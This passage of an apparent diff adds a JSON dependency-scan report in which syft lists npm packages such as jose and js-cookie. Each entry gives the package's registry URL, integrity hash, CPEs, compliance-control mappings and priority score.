"11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "cd8dbd159ce77812", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: is-url 1.2.4", + "title": "is-url 1.2.4", + "description": "Package discovered: is-url 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0055323086e6dbe0", + "name": "is-url", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:is-url:is-url:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-url:is_url:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_url:is-url:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_url:is_url:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is-url:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is_url:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/is-url@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/is-url/-/is-url-1.2.4.tgz", + "integrity": "sha512-ITvGim8FhRiYe4IQ5uHSkj7pVaPDrCTkNd3yq3cV7iZAcJdHTUMPMEHcqSOy9xZ9qFenQCvi+2wjH9a1nXqHww==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "25f78dcaa669e646", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: isarray 1.0.0", + "title": "isarray 1.0.0", + "description": "Package discovered: isarray 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "14ac0fadd6b69d11", + "name": "isarray", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:isarray:isarray:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/isarray@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b4f550816fd1d6a8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: isexe 2.0.0", + "title": "isexe 2.0.0", + "description": "Package discovered: isexe 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "18556628c2ed871d", + "name": "isexe", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:isexe:isexe:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/isexe@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "399923db78bd2f5d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: jackspeak 3.4.3", + "title": "jackspeak 3.4.3", + "description": "Package discovered: jackspeak 3.4.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "668b76a592331d7f", + "name": "jackspeak", + "version": "3.4.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BlueOak-1.0.0", + "spdxExpression": "BlueOak-1.0.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jackspeak:jackspeak:3.4.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/jackspeak@3.4.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", + "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", + "dependencies": { + "@isaacs/cliui": "^8.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c7be600d2bcad0a1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: jay-peg 1.1.1", + "title": "jay-peg 1.1.1", + "description": "Package discovered: jay-peg 1.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c5304af01a3223ed", + "name": "jay-peg", + "version": "1.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jay-peg:jay-peg:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:jay-peg:jay_peg:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:jay_peg:jay-peg:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:jay_peg:jay_peg:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:jay:jay-peg:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:jay:jay_peg:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/jay-peg@1.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/jay-peg/-/jay-peg-1.1.1.tgz", + "integrity": "sha512-D62KEuBxz/ip2gQKOEhk/mx14o7eiFRaU+VNNSP4MOiIkwb/D6B3G1Mfas7C/Fit8EsSV2/IWjZElx/Gs6A4ww==", + "dependencies": { + "restructure": "^3.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5b403253da2d4e5e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: jiti 1.21.7", + "title": "jiti 1.21.7", + "description": "Package discovered: jiti 1.21.7", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a3b57ee8874ce4dc", + "name": "jiti", + "version": "1.21.7", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jiti:jiti:1.21.7:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/jiti@1.21.7", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/jiti/-/jiti-1.21.7.tgz", + "integrity": "sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "feda20014c18c42e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: jose 4.15.9", + "title": "jose 4.15.9", + "description": "Package discovered: jose 4.15.9", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0246497cf4065c27", + "name": "jose", + "version": "4.15.9", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jose_project:jose:4.15.9:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/jose@4.15.9", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.9.tgz", + "integrity": "sha512-1vUQX+IdDMVPj4k8kOxgUqlcK518yluMuGZwqlr44FS1ppZB/5GWh4rZG89erpOBOJjU/OBsnCVFfapsRz6nEA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ad953d39f31a884d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: js-beautify 1.15.4", + "title": "js-beautify 1.15.4", + "description": "Package discovered: js-beautify 1.15.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "eb8b761fb0d3a989", + "name": "js-beautify", + "version": "1.15.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:js-beautify:js-beautify:1.15.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js-beautify:js_beautify:1.15.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js_beautify:js-beautify:1.15.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js_beautify:js_beautify:1.15.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js:js-beautify:1.15.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js:js_beautify:1.15.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/js-beautify@1.15.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/js-beautify/-/js-beautify-1.15.4.tgz", + "integrity": "sha512-9/KXeZUKKJwqCXUdBxFJ3vPh467OCckSBmYDwSK/EtV090K+iMJ7zx2S3HLVDIWFQdqMIsZWbnaGiba18aWhaA==", + "dependencies": { + "config-chain": "^1.1.13", + "editorconfig": "^1.0.4", + "glob": "^10.4.2", + "js-cookie": "^3.0.5", + "nopt": "^7.2.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "cb31e7fb1004281e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: js-cookie 3.0.5", + "title": "js-cookie 3.0.5", + "description": "Package discovered: js-cookie 3.0.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "07274f4b8a4d661e", + "name": "js-cookie", + "version": "3.0.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:js-cookie:js-cookie:3.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js-cookie:js_cookie:3.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js_cookie:js-cookie:3.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js_cookie:js_cookie:3.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js:js-cookie:3.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:js:js_cookie:3.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/js-cookie@3.0.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/js-cookie/-/js-cookie-3.0.5.tgz", + "integrity": "sha512-cEiJEAEoIbWfCZYKWhVwFuvPX1gETRYPw6LlaTKoxD3s2AkXzkCjnp6h0V77ozyqj0jakteJ4YqDJT830+lVGw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { 